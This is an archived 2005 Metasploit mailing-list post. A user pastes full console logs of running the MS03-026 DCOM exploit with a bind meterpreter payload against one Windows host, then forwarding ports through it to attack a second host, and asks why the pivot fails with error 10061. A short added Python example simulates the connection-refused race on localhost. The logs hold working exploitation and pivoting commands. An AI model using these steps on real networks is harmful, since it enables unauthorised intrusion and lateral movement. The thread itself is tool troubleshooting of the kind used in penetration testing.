Metasploit mailing list archives

use of meterpreter (copy for the list)


From: thomas.werth at vahle.de (Thomas Werth)
Date: Mon, 18 Apr 2005 10:07:48 +0200

> Does the bind handler ever say it established the connection?  Does it
> say this before or after the 'Connected to REMACT'?  If it says that the
> bind handler has established the connection before the 'REMACT' line
> then you may have created the port forward too soon.  Can you include
> the full output from the exploit command?

The bind handler doesn't say it establishes a connection. I just saw that in the
meterpreter window an error is thrown up: open_tcp_channel: failure, 10061.

I'll attach the full log of what I did; just as a note, after

meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 10.10.10.77:135
  127.0.0.1:4444 <-> 10.10.10.77:4444
meterpreter>

I start a second window, and when hitting "exploit" in the second window the
error msg comes in window 1.
Here's the log:

"Window 1"
vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole


                                  _       _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | | ___  _| |_
|    \ / _  )  _)/ _  |/___)  _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__
|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)
                           |_|


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > show options

Exploit Options
===============

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     135        The target port

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026 > set RHOST 10.10.10.88
RHOST -> 10.10.10.88
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default        Description
  --------    ------    -----------    ------------------
  required    RHOST     10.10.10.88    The target address
  required    RPORT     135            The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    METDLL      /usr/local/security/exploits/framework-2.3/data/meterpreter/metsrv.dll
                                     The full path the meterpreter server dll
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0x9a3c
[*] Got connection from 10.10.10.189:32784 <-> 10.10.10.88:4444
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -=    connected to    =- ]
[ -= meterpreter server =- ]
[ -=    v.  00000500    =- ]
meterpreter> use -m Net
loadlib: Loading library from 'ext212326.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> portfwd -a -L 127.0.0.1 -l 9000 -h 10.10.10.77 -p 135
portfwd: Successfully created local listener on port 9000.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter> portfwd -v
Local port forward listeners:

  127.0.0.1:9000 <-> 10.10.10.77:135
  127.0.0.1:4444 <-> 10.10.10.77:4444
meterpreter>
open_tcp_channel: failure, 10061.
meterpreter>
-------------------------------------------------------
"Window 2"
vpc189:/usr/local/security/exploits/framework-2.3 # ./msfconsole



                |                    |      _) |
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __|
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
                              _|


+ -- --=[ msfconsole v2.3 [56 exploits - 69 payloads]

msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
win32_bind              win32_bind_meterpreter  win32_bind_stg_upexec
win32_bind_dllinject    win32_bind_stg          win32_bind_vncinject
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf msrpc_dcom_ms03_026(win32_bind) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST                The target address
  required    RPORT     135        The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------
  required    EXITFUNC    thread     Exit technique: "process", "thread", "seh"
  required    LPORT       4444       Listening port for bind shell

  Target: Windows NT SP6/2K/XP/2K3 ALL

msf msrpc_dcom_ms03_026(win32_bind) > set RHOST 127.0.0.1
RHOST -> 127.0.0.1
msf msrpc_dcom_ms03_026(win32_bind) > set RPORT 9000
RPORT -> 9000
msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Got connection from 127.0.0.1:32786 <-> 127.0.0.1:4444

[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) >
---------------------------------------------
I'm getting the same error when delaying creation of the portfwd to right after
"Connected to REMACT with group ID 0xecd7".

Here's a second log of window 2:

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xecd6
[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Connected to REMACT with group ID 0xecd7
[*] Got connection from 127.0.0.1:32814 <-> 127.0.0.1:4444

[*] Exiting Bind Handler.

msf msrpc_dcom_ms03_026(win32_bind) >

First I tried without the portfwd of port 4444; second, I pushed it in right
after the connect msg.

Here's the corresponding log from window 1:

meterpreter> portfwd -r  -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully destroyed local listener on port 4444.
meterpreter> portfwd -a -L 127.0.0.1 -l 4444 -h 10.10.10.77 -p 4444
portfwd: Successfully created local listener on port 4444.
meterpreter>
open_tcp_channel: failure, 10061.
meterpreter>


Hope this will help you to help me :D
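The logs above show the local listener on 127.0.0.1:4444 accepting the bind handler's connection while the pivot side fails with 10061 (Winsock's "connection refused"), which is what happens when the forward tries to reach 10.10.10.77:4444 before anything listens there. The following Python example is added here and is not code from the thread or from Metasploit; it reproduces that race on localhost with a constructed late-starting listener standing in for the bind shell, and retries the remote side of the forward until the listener is up (the port number, delays and helper names are assumptions for the demo).

```python
import errno
import socket
import threading
import time

# POSIX ECONNREFUSED and Winsock WSAECONNREFUSED (the 10061 seen in the log)
REFUSED = (errno.ECONNREFUSED, 10061)

def try_connect(host, port, timeout=2.0):
    """One connect attempt for the remote side of a forward.
    Returns (socket, None) on success or (None, errno) when the peer refuses."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(timeout)
    try:
        s.connect((host, port))
        return s, None
    except ConnectionRefusedError as e:
        s.close()
        return None, e.errno

def connect_with_retry(host, port, attempts=50, delay=0.1):
    """Keep retrying while the peer refuses, i.e. until the bind listener exists.
    Returns (socket or None, number of attempts made)."""
    n = 0
    for n in range(1, attempts + 1):
        s, err = try_connect(host, port)
        if s is not None:
            return s, n
        time.sleep(delay)          # peer refused: listener not up yet, wait and retry
    return None, n

def _late_listener(port, delay):
    """Constructed stand-in for the bind shell: it only starts listening after `delay`."""
    time.sleep(delay)
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", port))
    srv.listen(1)
    conn, _ = srv.accept()
    conn.close()
    srv.close()

def simulate(listener_delay=0.5):
    """Reproduce the race: the forward's remote end is dialled before the shell listens."""
    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    port = probe.getsockname()[1]
    probe.close()                                   # nothing listens on `port` now
    _, first_err = try_connect("127.0.0.1", port)   # naive forward: refused immediately
    t = threading.Thread(target=_late_listener, args=(port, listener_delay), daemon=True)
    t.start()
    sock, tries = connect_with_retry("127.0.0.1", port)
    connected = sock is not None
    if sock is not None:
        sock.close()
    t.join(5)
    return {"first_errno": first_err, "connected": connected, "tries": tries}
```

A forwarder that accepts the local client before the remote connect succeeds hides the refusal from the handler, which is why window 2 printed "Got connection" while only window 1 saw the failure.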
